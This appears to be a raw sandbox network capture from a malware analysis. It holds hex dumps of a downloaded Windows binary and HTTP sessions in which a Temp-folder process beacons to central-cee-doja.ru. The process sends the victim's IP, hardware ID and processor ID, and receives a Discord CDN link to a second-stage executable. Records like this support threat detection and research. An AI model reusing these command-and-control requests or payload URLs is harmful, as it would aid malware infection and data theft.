2023-11-18 09:02:42 UTC	10194	IN	Data Raw: 05 00 13 68 06 00 04 e2 00 00 00 00 00 00 01 19 06 00 19 78 0a 00 10 68 09 00 07 01 1b 00 01 0a 01 00 0a a2 00 00 01 3d 08 00 3d 88 05 00 34 78 06 00 18 68 07 00 09 f2 02 30 01 0a 04 00 0a 34 08 00 0a 52 06 70 01 1a 06 00 1a 88 02 00 11 78 03 00 0d 72 09 30 01 19 0a 00 19 74 09 00 19 64 08 00 19 54 07 00 19 34 06 00 19 32 15 e0 19 19 0a 00 19 e4 09 00 19 74 08 00 19 64 07 00 19 34 06 00 19 32 15 f0 68 26 00 00 02 00 00 00 cb b9 00 00 29 ba 00 00 ff 11 15 00 68 ba 00 00 af b9 00 00 6e ba 00 00 1a 12 15 00 00 00 00 00 01 13 08 00 13 34 0c 00 13 52 0c f0 0a e0 08 70 07 60 06 50 01 0f 04 00 0f 34 06 00 0f 32 0b 70 01 18 0a 00 18 64 0c 00 18 54 0b 00 18 34 0a 00 18 52 14 f0 12 e0 10 70 01 0f 06 00 0f 54 0b 00 0f 34 0a 00 0f 72 0b 60 01 12 02 00 12 72 0b 50 01 Data Ascii: hxh==4xh04Rpxr0tdT42td42h&)hn4Rp`P42pdT4RpT4r`rP
2023-11-18 09:02:42 UTC	10210	IN	Data Raw: 09 00 0d 34 0b 00 0d 32 09 f0 07 70 06 60 01 16 06 00 16 52 12 f0 10 e0 0e c0 0c 60 0b 50 21 0c 04 00 0c 74 05 00 05 34 0d 00 e0 d4 03 00 2c d5 03 00 38 c1 17 00 21 05 02 00 05 d4 04 00 2c d5 03 00 41 d5 03 00 48 c1 17 00 21 00 00 00 2c d5 03 00 41 d5 03 00 48 c1 17 00 21 00 02 00 00 74 05 00 e0 d4 03 00 2c d5 03 00 38 c1 17 00 21 00 02 00 00 74 05 00 e0 d4 03 00 2c d5 03 00 38 c1 17 00 21 00 00 00 e0 d4 03 00 2c d5 03 00 38 c1 17 00 01 22 08 00 22 74 05 00 10 64 04 00 08 34 06 00 08 e0 06 50 01 1e 0a 00 1e 34 0f 00 1e 52 1a f0 18 e0 16 d0 14 c0 12 70 11 60 10 50 01 08 03 00 08 42 04 f0 02 30 00 00 21 10 04 00 10 74 0a 00 05 64 09 00 90 dc 03 00 ab dc 03 00 e8 c1 17 00 21 05 02 00 05 e4 04 00 ab dc 03 00 f9 dc 03 00 f4 c1 17 00 21 05 02 00 05 54 08 00 f9 Data Ascii: 42p`R`P!t4,8!,AH!,AH!t,8!t,8!,8""td4P4Rp`PB0!td!!T
2023-11-18 09:02:42 UTC	10226	IN	Data Raw: 18 00 21 00 00 00 a0 8b 06 00 b7 8b 06 00 08 01 18 00 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 0a 04 00 0a 34 06 00 0a 32 06 70 19 23 0a 00 14 34 12 00 14 72 10 f0 0e e0 0c d0 0a c0 08 70 07 60 06 50 60 8b 01 00 38 00 00 00 19 1e 07 00 0f 01 14 00 08 f0 06 e0 04 70 03 60 02 50 00 00 60 8b 01 00 78 00 00 00 21 25 08 00 25 68 08 00 1d d4 12 00 15 c4 13 00 08 34 1c 00 f0 8f 06 00 50 90 06 00 74 01 18 00 21 00 00 00 f0 8f 06 00 50 90 06 00 74 01 18 00 19 13 01 00 04 c2 00 00 60 8b 01 00 50 00 00 00 19 83 0a 00 83 e4 14 00 78 c4 12 00 0b b2 07 f0 05 70 04 60 03 50 02 30 60 8b 01 00 50 00 00 00 01 19 0a 00 19 34 11 00 19 52 15 f0 13 e0 11 d0 0f c0 0d 70 0c 60 0b 50 01 0f 06 00 0f 64 08 00 0f 34 07 00 0f 32 0b 70 21 05 02 00 05 54 06 00 40 9e 06 00 c3 9e 06 00 08 Data Ascii: !42p42p#4rp`P`8p`P`x!%%h4Pt!Pt`Pxp`P0`P4Rp`Pd42p!T@
2023-11-18 09:02:42 UTC	10239	IN	Data Raw: 08 00 9a 74 08 00 0f 54 0a 00 0f 34 09 00 0f 52 0b 60 01 14 08 00 14 64 0a 00 14 54 09 00 14 34 08 00 14 52 10 70 01 9a 08 00 9a 74 08 00 0f 54 0a 00 0f 34 09 00 0f 52 0b 60 01 0f 06 00 0f 64 11 00 0f 34 10 00 0f b2 0b 70 21 0a 04 00 0a e4 0f 00 05 54 0e 00 90 06 09 00 36 07 09 00 54 35 18 00 21 00 02 00 00 e4 0f 00 90 06 09 00 36 07 09 00 54 35 18 00 21 00 02 00 00 e4 0f 00 90 06 09 00 36 07 09 00 54 35 18 00 01 0a 04 00 0a 34 08 00 0a 52 06 70 01 b4 0a 00 b4 64 0e 00 15 74 11 00 15 54 10 00 15 34 0f 00 15 b2 11 e0 01 07 01 00 07 c2 00 00 01 07 01 00 07 c2 00 00 01 07 01 00 07 c2 00 00 01 12 07 00 12 c2 0e f0 0c d0 0a c0 08 70 07 50 06 30 00 00 21 0d 04 00 0d e4 0c 00 08 64 16 00 00 0b 09 00 a1 0b 09 00 e0 35 18 00 21 00 00 00 00 0b 09 00 a1 0b 09 00 e0 Data Ascii: tT4R`dT4RptT4R`d4p!T6T5!6T5!6T54RpdtT4pP0!d5!
2023-11-18 09:02:42 UTC	10255	IN	Data Raw: 09 00 05 34 0e 00 00 33 0d 00 1f 33 0d 00 00 75 18 00 21 05 02 00 05 c4 07 00 1f 33 0d 00 27 34 0d 00 0c 75 18 00 21 00 00 00 1f 33 0d 00 27 34 0d 00 0c 75 18 00 21 00 00 00 00 33 0d 00 1f 33 0d 00 00 75 18 00 01 18 07 00 18 62 14 f0 12 d0 10 c0 0e 70 0d 60 0c 30 00 00 21 04 02 00 04 54 11 00 b0 35 0d 00 eb 35 0d 00 60 75 18 00 21 04 02 00 04 e4 06 00 eb 35 0d 00 03 36 0d 00 74 75 18 00 21 00 00 00 eb 35 0d 00 03 36 0d 00 74 75 18 00 21 00 00 00 b0 35 0d 00 eb 35 0d 00 60 75 18 00 01 07 03 00 07 62 03 70 02 60 00 00 21 05 02 00 05 34 0a 00 f0 38 0d 00 fe 38 0d 00 bc 75 18 00 21 3f 08 00 3f 54 0b 00 15 f4 06 00 0d e4 0d 00 05 c4 0c 00 fe 38 0d 00 07 39 0d 00 c8 75 18 00 21 00 02 00 00 e4 0d 00 fe 38 0d 00 07 39 0d 00 c8 75 18 00 21 00 00 00 fe 38 0d 00 07 Data Ascii: 433u!3'4u!3'4u!33ubp`0!T55`u!56tu!56tu!55`ubp`!488u!??T89u!89u!8
2023-11-18 09:02:42 UTC	10271	IN	Data Raw: 10 00 00 b5 18 00 21 4c 0a 00 4c f4 08 00 47 e4 09 00 3b 74 0b 00 32 34 10 00 00 c4 0a 00 00 61 10 00 39 61 10 00 00 b5 18 00 21 00 0a 00 00 f4 08 00 00 e4 09 00 00 c4 0a 00 00 74 0b 00 00 34 10 00 00 61 10 00 39 61 10 00 00 b5 18 00 01 04 01 00 04 62 00 00 01 19 0a 00 19 74 11 00 19 64 10 00 19 54 0f 00 19 34 0e 00 19 b2 15 e0 01 14 08 00 14 74 04 00 0f 64 03 00 0a 54 02 00 05 34 01 00 19 21 07 00 0f 34 20 00 0f 01 1a 00 08 70 07 60 06 50 00 00 60 8b 01 00 c0 00 00 00 01 04 01 00 04 42 00 00 01 06 02 00 06 32 02 30 01 0f 06 00 0f 64 07 00 0f 34 06 00 0f 32 0b 70 01 27 0a 00 27 01 11 00 20 f0 1e e0 1c d0 1a c0 18 70 17 60 16 50 15 30 01 07 04 00 07 54 06 00 07 70 06 60 21 14 04 00 14 e4 05 00 05 34 04 00 b0 83 10 00 d3 83 10 00 f0 b5 18 00 21 00 04 00 00 Data Ascii: !LLG;t24a9a!t4a9abtdT4tdT4!4 p`P`B20d42p'' p`P0Tp`!4!
2023-11-18 09:02:42 UTC	10287	IN	Data Raw: 01 00 04 62 00 00 01 04 01 00 04 42 00 00 01 72 07 00 72 34 0e 00 0b 82 07 d0 05 c0 03 70 02 50 00 00 21 0a 04 00 0a e4 07 00 05 64 08 00 50 b3 13 00 c6 b3 13 00 28 f5 18 00 21 05 02 00 05 f4 06 00 c6 b3 13 00 30 b4 13 00 3c f5 18 00 21 00 00 00 c6 b3 13 00 30 b4 13 00 3c f5 18 00 21 00 02 00 00 e4 07 00 50 b3 13 00 c6 b3 13 00 28 f5 18 00 01 06 02 00 06 32 02 30 01 0a 04 00 0a 34 07 00 0a 32 06 70 01 0a 04 00 0a 34 07 00 0a 32 06 70 01 14 06 00 14 64 0a 00 14 34 08 00 14 52 10 70 01 0a 04 00 0a 34 07 00 0a 32 06 60 21 05 02 00 05 74 06 00 00 b9 13 00 35 b9 13 00 bc f5 18 00 21 00 00 00 00 b9 13 00 35 b9 13 00 bc f5 18 00 01 0f 06 00 0f 64 07 00 0f 34 06 00 0f 32 0b 70 01 14 08 00 14 64 09 00 14 54 08 00 14 34 07 00 14 32 10 70 01 0e 04 00 0e d2 0a f0 08 Data Ascii: bBrr4pP!dP(!0<!0<!P(2042p42pd4Rp42`!t5!5d42pdT42p
2023-11-18 09:02:42 UTC	10303	IN	Data Raw: 61 67 65 57 00 00 1f 02 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 41 00 56 02 47 65 74 4c 61 73 74 45 72 72 6f 72 00 00 37 02 47 65 74 46 69 6c 65 41 74 74 72 69 62 75 74 65 73 41 00 00 39 02 47 65 74 46 69 6c 65 41 74 74 72 69 62 75 74 65 73 45 78 57 00 00 fd 03 4f 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6e 67 57 00 00 9b 01 46 6c 75 73 68 56 69 65 77 4f 66 46 69 6c 65 00 ba 00 43 72 65 61 74 65 46 69 6c 65 41 00 a8 03 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 00 10 06 6c 73 74 72 63 61 74 57 00 00 bc 05 57 61 69 74 46 6f 72 53 69 6e 67 6c 65 4f 62 6a 65 63 74 45 78 00 08 01 44 65 6c 65 74 65 46 69 6c 65 41 00 0b 01 44 65 6c 65 74 65 46 69 6c 65 57 00 3f 03 48 65 61 70 52 65 41 6c 6c 6f 63 00 7f 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 d7 02 47 65 74 Data Ascii: ageWGetDiskFreeSpaceAVGetLastError7GetFileAttributesA9GetFileAttributesExWOutputDebugStringWFlushViewOfFileCreateFileALoadLibraryAlstrcatWWaitForSingleObjectExDeleteFileADeleteFileW?HeapReAllocCloseHandleGet
2023-11-18 09:02:42 UTC	10319	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 47 16 80 01 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 05 08 80 00 58 bf 16 80 01 00 00 00 00 00 00 00 00 00 00 00 d0 f2 0d 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 47 16 80 01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 08 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 49 16 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 08 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 49 16 80 01 00 00 00 00 00 00 00 00 00 00 00 01 Data Ascii: HGXHGII
2023-11-18 09:02:43 UTC	10335	IN	Data Raw: 03 00 7a c5 03 00 fc be 17 00 80 c5 03 00 2e c6 03 00 10 bf 17 00 2e c6 03 00 82 c6 03 00 24 bf 17 00 82 c6 03 00 9c c8 03 00 3c bf 17 00 9c c8 03 00 eb c8 03 00 50 bf 17 00 eb c8 03 00 00 c9 03 00 60 bf 17 00 10 c9 03 00 3c c9 03 00 70 bf 17 00 3c c9 03 00 72 ca 03 00 7c bf 17 00 72 ca 03 00 7b ca 03 00 a0 bf 17 00 7b ca 03 00 5e cb 03 00 b0 bf 17 00 d0 cb 03 00 ec cb 03 00 d4 bf 17 00 ec cb 03 00 fc cb 03 00 dc bf 17 00 fc cb 03 00 89 cc 03 00 f0 bf 17 00 89 cc 03 00 96 cc 03 00 08 c0 17 00 96 cc 03 00 9c cc 03 00 18 c0 17 00 b0 cc 03 00 47 cd 03 00 28 c0 17 00 50 cd 03 00 73 cd 03 00 38 c0 17 00 73 cd 03 00 e0 cd 03 00 48 c0 17 00 e0 cd 03 00 f0 cd 03 00 5c c0 17 00 00 ce 03 00 30 ce 03 00 6c c0 17 00 30 ce 03 00 0b cf 03 00 80 c0 17 00 0b cf 03 00 21 Data Ascii: z..$<P`<p<r\|r{{^G(Ps8sH\0l0!
2023-11-18 09:02:43 UTC	10351	IN	Data Raw: 07 00 24 1f 18 00 20 e2 07 00 9a e2 07 00 2c 1f 18 00 a0 e2 07 00 34 e3 07 00 3c 1f 18 00 40 e3 07 00 d3 e3 07 00 48 1f 18 00 e0 e3 07 00 30 e4 07 00 60 1f 18 00 30 e4 07 00 ef e4 07 00 74 1f 18 00 ef e4 07 00 07 e5 07 00 88 1f 18 00 90 e6 07 00 cf e6 07 00 98 1f 18 00 cf e6 07 00 be e7 07 00 a8 1f 18 00 be e7 07 00 d3 e7 07 00 c0 1f 18 00 10 e8 07 00 69 e8 07 00 d0 1f 18 00 70 e8 07 00 a9 e8 07 00 dc 1f 18 00 a9 e8 07 00 c5 e9 07 00 e4 1f 18 00 c5 e9 07 00 e0 e9 07 00 fc 1f 18 00 e0 e9 07 00 e1 e9 07 00 14 20 18 00 f0 e9 07 00 18 ea 07 00 24 20 18 00 20 ea 07 00 1e eb 07 00 2c 20 18 00 30 eb 07 00 d6 eb 07 00 3c 20 18 00 e0 eb 07 00 23 f0 07 00 44 20 18 00 30 f0 07 00 51 f0 07 00 54 20 18 00 51 f0 07 00 7a f0 07 00 5c 20 18 00 7a f0 07 00 82 f0 07 00 70 Data Ascii: $ ,4<@H0`0tip $ , 0< #D 0QT Qz\ zp
2023-11-18 09:02:43 UTC	10367	IN	Data Raw: 18 00 c0 f1 0d 00 67 f2 0d 00 20 80 18 00 70 f2 0d 00 c1 f2 0d 00 30 80 18 00 d0 f2 0d 00 10 f4 0d 00 3c 80 18 00 10 f4 0d 00 8a f6 0d 00 50 80 18 00 8a f6 0d 00 9c f6 0d 00 64 80 18 00 f0 f6 0d 00 c8 fb 0d 00 74 80 18 00 d0 fb 0d 00 12 fc 0d 00 84 80 18 00 20 fc 0d 00 62 fc 0d 00 8c 80 18 00 70 fc 0d 00 b2 fc 0d 00 94 80 18 00 c0 fc 0d 00 86 fd 0d 00 9c 80 18 00 90 fd 0d 00 ef fd 0d 00 ac 80 18 00 00 fe 0d 00 31 ff 0d 00 b4 80 18 00 40 ff 0d 00 77 00 0e 00 c8 80 18 00 80 00 0e 00 ec 00 0e 00 dc 80 18 00 00 01 0e 00 91 02 0e 00 e8 80 18 00 a0 02 0e 00 f4 02 0e 00 fc 80 18 00 f4 02 0e 00 bd 05 0e 00 0c 81 18 00 bd 05 0e 00 ca 05 0e 00 28 81 18 00 d0 05 0e 00 10 07 0e 00 38 81 18 00 20 07 0e 00 85 07 0e 00 4c 81 18 00 85 07 0e 00 6a 09 0e 00 60 81 18 00 6a Data Ascii: g p0<Pdt bp1@w(8 Lj`j
2023-11-18 09:02:43 UTC	10383	IN	Data Raw: 12 00 1d e7 12 00 8c e0 18 00 30 e7 12 00 e0 e7 12 00 98 e0 18 00 f0 e7 12 00 38 ea 12 00 ac e0 18 00 40 ea 12 00 4d ea 12 00 c8 e0 18 00 4d ea 12 00 7f ea 12 00 d0 e0 18 00 7f ea 12 00 62 eb 12 00 e8 e0 18 00 62 eb 12 00 6d eb 12 00 00 e1 18 00 6d eb 12 00 88 eb 12 00 10 e1 18 00 90 eb 12 00 7d ec 12 00 24 e1 18 00 90 ec 12 00 2b ef 12 00 34 e1 18 00 40 ef 12 00 ee f0 12 00 50 e1 18 00 00 f1 12 00 8f f2 12 00 68 e1 18 00 a0 f2 12 00 df f2 12 00 84 e1 18 00 df f2 12 00 f5 f2 12 00 94 e1 18 00 f5 f2 12 00 10 f4 12 00 a8 e1 18 00 10 f4 12 00 1e f4 12 00 c0 e1 18 00 1e f4 12 00 60 f4 12 00 d0 e1 18 00 70 f4 12 00 78 f4 12 00 e0 e1 18 00 78 f4 12 00 90 f7 12 00 ec e1 18 00 90 f7 12 00 a9 f7 12 00 14 e2 18 00 b0 f7 12 00 08 f8 12 00 24 e2 18 00 10 f8 12 00 e4 Data Ascii: 08@MMbbmm}$+4@Ph`pxx$
2023-11-18 09:02:43 UTC	10399	IN	Data Raw: c8 a4 d0 a4 d8 a4 e0 a4 e8 a4 f0 a4 f8 a4 00 a5 08 a5 10 a5 18 a5 20 a5 28 a5 08 a6 b0 a6 b8 a6 c0 a6 c8 a6 d0 a6 d8 a6 e0 a6 e8 a6 00 00 00 50 17 00 18 00 00 00 58 a8 60 a8 68 a8 70 a8 08 a9 10 a9 18 a9 00 00 00 60 17 00 f8 00 00 00 70 a6 78 a6 80 a6 90 a6 98 a6 a0 a6 a8 a6 b0 a6 b8 a6 c0 a6 e0 a6 f0 a6 f8 a6 00 a7 10 a7 18 a7 20 a7 30 a7 38 a7 40 a7 50 a7 58 a7 60 a7 70 a7 78 a7 80 a7 90 a7 98 a7 50 a9 58 a9 60 a9 68 a9 70 a9 78 a9 80 a9 38 ab 58 ab 98 ab a0 ab a8 ab b0 ab b8 ab c0 ab c8 ab d0 ab d8 ab e0 ab e8 ab f0 ab f8 ab 00 ac 08 ac 10 ac 18 ac 20 ac 28 ac 30 ac 38 ac 40 ac 48 ac 58 ac 60 ac 68 ac 70 ac 78 ac 00 ad 08 ad 10 ad 18 ad 20 ad 28 ad 30 ad 38 ad 40 ad 48 ad 50 ad 58 ad 08 ae b0 ae b8 ae c0 ae c8 ae d0 ae d8 ae e0 ae e8 ae f0 ae f8 ae 00 Data Ascii: (PX`hp`px 08@PX`pxPX`hpx8X (08@HX`hpx (08@HPX
2023-11-18 09:02:43 UTC	10415	IN	Data Raw: a5 b2 a2 25 b2 c8 17 35 6e 30 1d 06 03 55 1d 0e 04 16 04 14 36 44 86 8e a4 ba b0 66 be bc 28 2d 1d 44 36 dd e3 6a 7a bc 30 71 06 03 55 1d 1f 04 6a 30 68 30 32 a0 30 a0 2e 86 2c 68 74 74 70 3a 2f 2f 63 72 6c 33 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 73 68 61 32 2d 61 73 73 75 72 65 64 2d 74 73 2e 63 72 6c 30 32 a0 30 a0 2e 86 2c 68 74 74 70 3a 2f 2f 63 72 6c 34 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 73 68 61 32 2d 61 73 73 75 72 65 64 2d 74 73 2e 63 72 6c 30 81 85 06 08 2b 06 01 05 05 07 01 01 04 79 30 77 30 24 06 08 2b 06 01 05 05 07 30 01 86 18 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 30 4f 06 08 2b 06 01 05 05 07 30 02 86 43 68 74 74 70 3a 2f 2f 63 61 63 65 72 74 73 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 44 69 67 Data Ascii: %5n0U6Df(-D6jz0qUj0h020.,http://crl3.digicert.com/sha2-assured-ts.crl020.,http://crl4.digicert.com/sha2-assured-ts.crl0+y0w0$+0http://ocsp.digicert.com0O+0Chttp://cacerts.digicert.com/Dig

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	104.21.89.193	443	192.168.2.4	49882	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:51 UTC	10715	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:52 UTC	10715	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R2REyXjwdXncommjDkcNLqIxSnr3bCeb6y7L2bjShTd3Hr4YiweFVmAHhGPQ6Cx2%2BKtdak5xp6i%2Fk%2FoNZz2BqlRgcYJrg80DXdvIGkDui4Zk239q02OB%2B6febBR%2B7eCUj7tLef6p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0aee299b681a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:52 UTC	10716	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:52 UTC	10716	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.4	49882	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:51 UTC	10715	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:52 UTC	10715	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R2REyXjwdXncommjDkcNLqIxSnr3bCeb6y7L2bjShTd3Hr4YiweFVmAHhGPQ6Cx2%2BKtdak5xp6i%2Fk%2FoNZz2BqlRgcYJrg80DXdvIGkDui4Zk239q02OB%2B6febBR%2B7eCUj7tLef6p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0aee299b681a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:52 UTC	10716	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:52 UTC	10716	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.4	49884	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:52 UTC	10716	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:53 UTC	10716	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rhHQBXE1%2BYP39IjkMtnAJ32Sel2WmW3RalUDx14jZFTkDLtYFj5FFuyoHVfpSUCL7x3JmER6uH65wrcUQS6tlFgm7ApXy%2FUH6QBVZOOEgO8CpofhMrw8bMyd0OjF6siQ3xzPBrEA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0af559e0c3b1-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:53 UTC	10716	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:53 UTC	10716	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	104.21.89.193	443	192.168.2.4	49884	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:52 UTC	10716	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:53 UTC	10716	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rhHQBXE1%2BYP39IjkMtnAJ32Sel2WmW3RalUDx14jZFTkDLtYFj5FFuyoHVfpSUCL7x3JmER6uH65wrcUQS6tlFgm7ApXy%2FUH6QBVZOOEgO8CpofhMrw8bMyd0OjF6siQ3xzPBrEA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0af559e0c3b1-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:53 UTC	10716	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:53 UTC	10716	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	104.21.89.193	443	192.168.2.4	49887	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:54 UTC	10716	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:54 UTC	10717	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z5Puwop8Lrl99udh%2FJl%2Ff1QMpkoSfW6RnQEMSq7enOeXl0ka8zEBEk79Lzj8Tk9frlNuvp33%2FXj9u0Zvt9nU4biR5i7w365en6kkguoFlmwMFBrogrOMOuYeod7sTFCfRb7Tcahj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0afcdb1f2760-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:54 UTC	10717	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:54 UTC	10717	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.4	49887	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:54 UTC	10716	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:54 UTC	10717	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z5Puwop8Lrl99udh%2FJl%2Ff1QMpkoSfW6RnQEMSq7enOeXl0ka8zEBEk79Lzj8Tk9frlNuvp33%2FXj9u0Zvt9nU4biR5i7w365en6kkguoFlmwMFBrogrOMOuYeod7sTFCfRb7Tcahj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0afcdb1f2760-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:54 UTC	10717	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:54 UTC	10717	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	104.21.89.193	443	192.168.2.4	49889	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:55 UTC	10717	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
